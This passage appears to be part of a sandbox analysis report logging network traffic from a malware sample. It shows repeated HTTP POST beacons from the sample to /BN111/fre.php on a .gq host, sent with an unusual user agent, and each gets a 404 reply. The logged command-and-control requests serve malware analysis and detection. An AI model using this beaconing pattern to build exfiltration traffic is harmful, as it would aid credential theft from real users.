                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfbcfff06925-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      18192.168.2.649799172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:42.274934053 CEST1109OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:42.387685061 CEST1110INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0EH47MMNXBWoZhSTeJKDFH5ttH4eNOc7DIMbRM5RUcGlJfPGdlM2qgJ%2FydGTeU89PVVspTxJUD78%2FLsz4jje9NE8J9ra8L440XXrJYNDu3lHjX7Az2%2FQMSbcG0NHixWuQ8qg3I%2FvBmZH39V3W4%2BLjJC5wpkOjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfc43f923240-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      19192.168.2.649800104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:43.873245001 CEST1111OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:43.996604919 CEST1112INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=krWVnXC%2BdefgGbNlcpBvuV%2B%2FEt1AN8TvqNCkwdnHu1u%2B%2Br4NhUyvinuefOGVyWbc9ShnhxYhW4%2BuqcpJdGFs2cOx%2Bg6Ex6pVLOOMw3MGB8imhhNCOi5JQPVnEFzH54P2wj3uTDGZgD%2B%2BgOSe36UWuNVLFTWpSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfce38355bed-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.649781104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:21.339482069 CEST1058OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:21.535239935 CEST1059INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gywdBNFWVFKIiZY3FEiKOzs84VMPVYr0KsnkFxu9YBLF66h9wh5gFt%2BKvxTgQoptbBobPo4zo%2FqKzOkAcdBuhuoMMrcjb2wrOtLU4%2BScQPJGN05F5R8f5lBn8MTmqMmHsvXJe26qCeRgvef6Z2NcGbvmdK2vnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf4179ac16e6-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      20192.168.2.649801172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:45.343358994 CEST1113OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:45.464049101 CEST1114INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CpHKxOLOrpPIM1PF5NEE6vUZ3l5dbYDOl6UNrbCahs5hxC4aJJGhGN7oKjrOL0BSNTAo1uQVbVx5SYG5UeeMMxOeU8B5DsuS3mvrPAdrCRib2ajEVOGtz7to8pV1YDKcBopo%2FKcmdVe3ptFDjf6kWXXiTMwHzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfd76c86440d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      21192.168.2.649802104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:48.039638042 CEST1115OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:48.163419962 CEST1116INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xX8MVuCGjS0FNM%2FvuL2BD8nyHgscINdYF2sTG5gdSsMS3%2F808sSrsFsd18a3PVjF22lX8c6mqEJFN4gRhXrpUEkmDty5RH6trK9n7XiwuMhOgsGG0JxWNKvSSmXgx%2F38h9tCGGDosMS%2FwDye9z6hmxb7OGqF0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfe84d3e4309-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      22192.168.2.649803104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:49.659260988 CEST1117OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:49.774518013 CEST1118INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3nVDbQqzeq99VtQdxhWX%2Fj7fXtAJV7srTKCv221y2RZh2a%2F8IS0yw3Zf9GABw%2F42RW46cAvIOehRvvP4M6%2FyJSAId%2Bgjb24pBzUjcG3sOSc%2FJAPaXI%2FrScX7pLEjJO5mSc8ztul8%2Bxk3KF3VKTeg%2Fa5igJ67pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debff26ef15c2c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      23192.168.2.649804104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:50.976326942 CEST1119OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:51.090559006 CEST1120INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sy0tXiUZGLf%2FShCOiRUnNRckJK1ccZE5lquOjWMUouZuuVvcp%2BfhB5GGR1S0BhIE6pVkDFG%2FzmcmHMOfWnDo6YPcj7m3%2FYYbTB4GxN%2BjA6S6jjPL6chZ1jihY6yWnxqgycQOlIXIPvuqEaE1VHcfl3z2NHMvrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debffaaf320621-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      24192.168.2.649805104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:52.327367067 CEST1121OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:52.449971914 CEST1122INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0%2F0G%2FltPrkYLGxzRCt9VdfNUMtip3rLXsYuFpJSTw2Tm%2Bkk99WneQCuJnmMJyMyxB%2FadH9hc7Nck4D5MaWnJHgR8m%2BeuWRD%2BWW1k6AEiWmmZ9D3wy1JfLuw3Xnsjx%2F97L17z30dxppqVVpdcP7o%2BEMd9GCUKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0031f88c2c7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      25192.168.2.649806172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:53.563440084 CEST1123OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:53.674302101 CEST1124INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SNwUQXmpNoSyQjbUBF5l8GTY8SywVTmzZ8AkYzJWy0b1O3O5n7b1dHE%2BpDh78zb6iFJ%2BdNIyBnabgJCYCBp9qDa6TZYlhCr6htZEMFmSRyHaUU%2F5WZkBITRFMBZ70zlWfi%2BTeSLQBR3OnT37qPUC6HdB7R1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec00acb8868e9-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      26192.168.2.649807104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:54.645978928 CEST1125OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:54.761792898 CEST1126INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iKke1AJBJjg1Y4VYs826dmfarUEhJ%2BRldRquW1kfSHN%2F9pyLtsyynuFr6yDn27OBJXeF7xvTdW%2Ft8i1FIp5x0Weuf1lZLtQZXeLjxSzbBGO%2FyFV1amXpr3qEg91BlnrsxMydhByRN7hHp%2FNzcUVzgokqELeaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0119f8505d0-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      27192.168.2.649808172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:56.080095053 CEST1127OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:56.196356058 CEST1128INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZERCavJqd%2FSKMbfz%2FCdLS9YwGowXmP6tmsSmcJhamaT8Ait4OW44MSZPDPU0Da0xQWD1O7rujLd4vYbmYz9A17IY8%2BGwpvDcLDsDokZqYZuqyxlqEAsXlvosJbc66ZygTYhi55wxB4l2t2Jm5O0fXdSbA4yjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec01a8bea1f31-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      28192.168.2.649810172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:57.516459942 CEST1131OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:57.630285978 CEST1132INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5KNJiSYA%2FFwVwmEIc9wb3cwwX%2FatGRb1JUO%2Bz%2BO1X6dOTVK5OasGDuojIDlalGExPnvGUgm4%2BBjy6wcTbge3HFAtucsxDcKdwQEvnp1sBeGdfQVSDQonetbCFSY%2BgvOrCkvkI7mREs82y4gLDOZB6jrrwpPJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0238f384df4-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      29192.168.2.649811172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:58.883204937 CEST1133OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:59.036413908 CEST1134INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DM7UDqfrOC0u1TfBnQ6rtX30q18tMXbF5JIb91n%2BbGCB6ZdVbFXYS95wCnHdXiccXK3L6LtGQvYayuHRvdRXTsx%2Bp%2F8MP1IOTYSnqgQ1RzzD0YUpci6oZfH4e%2BVOk7%2BgeLA12NXL%2BrdcTTN7OA8MSANsnvfhKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec02c0d56695b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.649782104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:22.592927933 CEST1060OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:22.751913071 CEST1061INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rIV1TCFtSps327NCu2VLT4v29yYPaf8k0h8mWGTLoJdR4ctIDPvXYKYGHAiiR70AaLpuz4o3vkmUXm72wLswxeU23M%2BVnkrC6oouZxiAyBfAU%2B7srHMGXyKvERWjs%2FICV8ZBHL3aKPib3xMytSdkecNOp%2BGqKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf493e674e9d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      30192.168.2.649812172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:00.298238039 CEST1135OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:00.410363913 CEST1136INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pzxxxAx7m5C%2BvI0HV9vpq2v%2FMh%2FQtCUhiuQVfVDamOYlWTH%2Fi66M79yyl7xYeat0IDW%2FErpRaBlSviuH6N5w1T51LJh6ilhSkpq5iiAXlGSkcN%2F0RFH%2B4gKfqMyKqrLMrZ%2F9KQlOg0PnfcEYBS9mMuv2oXUEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec034ea085c38-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      31192.168.2.649813172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:01.666924000 CEST1137OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:01.827079058 CEST1138INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwxyEXrfJWD7HzQsJLaaJ4ykrDR%2FXfvMae8i0xj3UPR%2Bl89OWY%2FzFHl6zIsjt3MczmsMNyXqydAx4kl6J4imX5JAkkeop22%2Bp9dS34N1vYjp83Fzoam6oRK%2Bx64oqTTVoWsVbFiS6fNE%2F4OFRWqA4k1a9wK%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec03d7f2c3250-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      32192.168.2.649814104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:03.076479912 CEST1139OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:03.214101076 CEST1140INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91AmIffLnKe4Pbncz7KrUdCC7%2FIC1zkuoHQN1JfssoGk24gGXGVgK%2FfjSd%2BRFPNjQzfYkOwMtC%2FXqL%2BrxK2TSNEenBHg5Mzc%2Fbxkf4%2Fw%2FzewmKsOYKbBYCwux31XnGOv3FNqWKnELOMAweMsH1mdlUR0lqprnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0464cd51772-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      33192.168.2.649815172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:06.184636116 CEST1141OUTPOST /BN111/fre.php HTTP/1.0
